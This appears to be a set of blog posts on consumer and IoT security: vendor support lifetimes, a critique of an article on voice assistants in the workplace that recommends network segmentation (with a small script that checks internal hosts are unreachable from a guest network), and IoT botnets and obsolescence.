A few years ago, I bought a cordless phone that also communicated with Skype. From the phone handset, I could make or answer either a POTS call, or a Skype voice call. This was great - for a while. Unfortunately the hardware vendor never upgraded the phone’s drivers for a new operating system version, which I had upgraded to for various reasons, including improved security.

For a while I soldiered on, using various hacks to keep my Skype phone working, but when the rechargeable batteries died, I threw the whole thing in the recycling bin and got a new, simpler cordless phone that did not depend on complicated software support.

A cordless phone is simple and inexpensive to replace. Imagine that had been my entire Home of the Future IoT setup, with doorbells, locks, alarms, thermostats, fridges, ovens, and who knows what else. "Sorry, your home is no longer supported."¹

With a subscription, there is a reasonable expectation that vendors will continue to provide support for the reasonable lifetime of their products (and if they don’t, there is a contract with the force of law behind it).

Whether it’s for your home or your business, if you rely on it, make sure that you pay for a subscription, so that you can be assured of support from the vendor.


  1. Smart home support: "Have you tried closing all the windows and then reopening them one by one?" 

Talk Softly

With the advent of always-on devices that are equipped with sensitive microphones and a permanent connection to the Internet, new security concerns are emerging.

Virtual assistants like Apple’s Siri, Microsoft’s Cortana and Google Now have the potential to make enterprise workers more productive. But do "always listening" assistants pose a serious threat to security and privacy, too?

Betteridge’s Law is in effect here. Sure enough, the second paragraph of the article discloses its sources:

Nineteen percent of organizations are already using intelligent digital assistants, such as Siri and Cortana, for work-related tasks, according to Spiceworks’ October 2016 survey of 566 IT professionals in North America, Europe, the Middle East and Africa.

A whole 566 respondents, you say? From a survey run by a help desk software company? One suspects that the article is over-reaching a bit - and indeed, if we click through to the actual survey, we find this:

Intelligent assistants (e.g., Cortana, Siri, Alexa) used for work-related tasks on company-owned devices had the highest usage rate (19%) of AI technologies

That is a little bit different from what the CSO Online article is claiming. Basically, anyone with a company-issued iPhone who has ever used Siri to create an appointment, set a reminder, or send a message about anything work-related would fall into this category.

Instead, the article makes the leap from that limited claim to extrapolating that people will be bringing their Alexa device to work and connecting it to the corporate network. Leaving aside for a moment the particular vision of hell that is an open-plan office where everyone is talking into the air all the time, what does that mean for the specific recommendations in the article?

  1. Focus on user privacy
  2. Develop a policy
  3. Treat virtual assistant devices like any IoT device
  4. Decide on BYO or company-owned
  5. Plan to protect

These are actually not bad recommendations - but they are so generic as to be useless. Worse, when they do get into specifics, they are almost laughably paranoid:

Assume all devices with a microphone are always listening. Even if the device has a button to turn off the microphone, if it has a power source it’s still possible it could be recording audio.

This is drug-dealer level of paranoia. Worrying that Alexa might be broadcasting your super secret and valuable office conversations does not even make the top ten list of concerns companies should have about introducing such devices into their networks.

The most serious threat you can get from Siri at work is co-workers pranking you if you enable access from the lock screen. In that case, anyone can grab your unattended iPhone and instruct Siri to call you by some ridiculous name. Of course I would never sabotage a colleague’s phone by renaming him "Sweet Cakes". Ahem. Interestingly, it turns out that the hypothetical renaming also extends to the entry in the Contacts…

The real concern is that by focusing on these misguided recommendations, the focus is taken off advice that would actually be useful in the real world. For instance, if you must have IoT devices in the office for some reason, this is good advice:

One way to segment IoT devices from the corporate network is to connect them to a guest Wi-Fi network, which doesn’t provide access to internal network resources.

This recommendation applies to any device that needs Internet access but does not require access to resources on the internal network. This will avoid issues where, by compromising a device (or its enabling cloud service), intruders are able to access your internal network in what is known as a "traversal attack". If administrators restrict the device’s access to the network, that will also restrict the amount of damage an intruder can do.
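
Segmentation is also only as good as its enforcement, so it is worth verifying from the IoT segment itself that internal resources really are unreachable. A minimal sketch of such a check (my own illustration; the internal hosts and ports are invented):

```typescript
// Sketch: from the guest/IoT network, internal hosts should be unreachable.
import { Socket } from "node:net";

// Hypothetical internal resources that the guest network must NOT reach.
const INTERNAL_HOSTS = [
  { host: "10.0.0.10", port: 445 },  // file server
  { host: "10.0.0.20", port: 3389 }, // remote-desktop jump box
];

function isReachable(host: string, port: number, timeoutMs = 2000): Promise<boolean> {
  return new Promise((resolve) => {
    const sock = new Socket();
    sock.setTimeout(timeoutMs);
    sock.once("connect", () => { sock.destroy(); resolve(true); });
    sock.once("timeout", () => { sock.destroy(); resolve(false); });
    sock.once("error", () => resolve(false));
    sock.connect(port, host);
  });
}

// Run from a device on the IoT/guest segment: every "REACHABLE" line is a
// hole in the segmentation.
for (const { host, port } of INTERNAL_HOSTS) {
  isReachable(host, port).then((ok) =>
    console.log(`${host}:${port} ${ok ? "REACHABLE (bad)" : "blocked (good)"}`));
}
```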

Thinking about access to data is a good idea in general, not just for voice assistants or IoT devices:

Since personal virtual assistants "rely on the cloud to comprehend complex commands, fetch data or assign complex computing tasks to more resources," their use in the enterprise raises issues about data ownership, data retention, data and IP theft, and data privacy enforcement that CISOs and CIOs will need to address.

Any time companies choose to adopt a service that relies on the cloud, their attack surface is not limited to the device itself, but also extends to that back-end service - which is almost certainly outside their visibility and control. Worse, in a BYOD scenario, users may introduce new devices and services to the corporate network that are not designed or configured for compliance with organisations’ security and privacy rules.

Security is important - but let’s focus on getting the basics right, without getting distracted by overly-specific cybersecurity fantasy role-playing game scenarios involving Jason Bourne hacking your Alexa to steal your secrets.

IoT Future: Saved by Obsolescence?

It’s that most magical time of year… no, not Christmas, that’s all over now until next December. No, I mean CES, the annual Consumer Electronics Show in Las Vegas. Where better than Vegas for a million ridiculous dreams to enjoy brief moments of fame, only to fade soon after?

It used to be that the worst thing that could come out of CES was a drawer full of obsolete gadgets. These days, things can get a bit more serious. Pretty much every gadget on display is now wifi-enabled and internet-connected - yes, even the pillows and hairbrushes.

The reason this proliferation of connectivity is a problem is the "blinking twelves" factor, that I have written about before:

Back in the last century, digital clocks with seven-segment displays became ubiquitous, including as part of other items of home electronics such as VCRs. When first plugged in, these would blink "12:00" until the time was set by the user.

Technically-minded people soon noticed that when they visited less technical friends or relatives, all the appliances in the house would still be blinking "12:00" instead of the correct time. The "blinking twelves" rapidly became short-hand for "civilians" not being able to – or not caring to – keep up with the demands of ubiquitous technology.

The problem that we are facing is that computing has begun to spread beyond the desktop. Even the most technophobic now carry a phone that is "smart" to a greater or lesser degree, and many people treat these devices much like their old VCRs, installing them once and then forgetting about them. However, all of these devices are running 24/7, connected to the public Internet, with little to no management or updates.

Now we are starting to see the impact of that situation. Earlier this year, one of the biggest botnets in history was created from hacked smart CCTV cameras and took down big chunks of the Internet.

That’s just crude weight-of-numbers stuff, though; the situation will get even more… interesting as people figure out how to use all of the data gathered by those Things - and not just the owners of the devices, either. As people introduce always-on internet-connected microphones into their homes, it’s legitimate for police to wonder what evidence those microphones may have overheard. It is no longer totally paranoid to wonder what the eventual impact will be:

Remember that quaint old phrase "in the privacy of your own home". I wonder how often we will be using it in 20 years' time.

What can we do?

Previous scares have shown that there is little point in the digerati getting all excited about these sorts of things. People have enough going on with their lives; it takes laws to force drivers to take care of basic maintenance of their cars, and we are talking about multi-tonne hunks of metal capable of speeds in excess of 100mph. Forget about getting them to update firmware on every single device in their home, several times a year.

Calls for legislation of IoT are in my opinion misguided; previous attempts to apply static legal frameworks to the dynamic environment of the Internet have tended to be ineffective at best, and to backfire at worst.

Ultimately, what will save us is that same blinking twelves nature of consumers. There is a situation right now in San Francisco, where the local public transport system’s display units that should show the time until the next bus or train are giving wildly inaccurate times:

To blame is a glitch that's rendered as many as 40 percent of buses and Muni vehicles "invisible" to the NextMuni system: A bus or light rail train could arrive far sooner than indicated, but the problem, which emerged this week, is not expected to be resolved for several weeks.

Muni management have explained the problem (emphasis mine):

NextMuni data is transmitted via AT&T’s wireless cell phone network. As Muni was the first transit agency to adopt the system, the NextMuni infrastructure installed in 2002 only had the capacity to use a 2G wireless network – a now outdated technology which AT&T is deactivating nationwide.

What took down NextMuni - the obsolescence of the 2G network that it relied on - will also be the fix for all the obsolete and insecure IoT devices out there, next time there is a major upgrade in wifi standards. More expert users may proactively upgrade their wifi access points to get better speed and range, but that will not catch most of the blinking twelves people. However, it’s probably safe to assume that most of the Muggles are relying on devices from their internet provider, and when their provider sends them a new device or they change provider, hey presto - all the insecure Things get disconnected from their botnets.

Problem solved?


Image by Arto Marttinen via Unsplash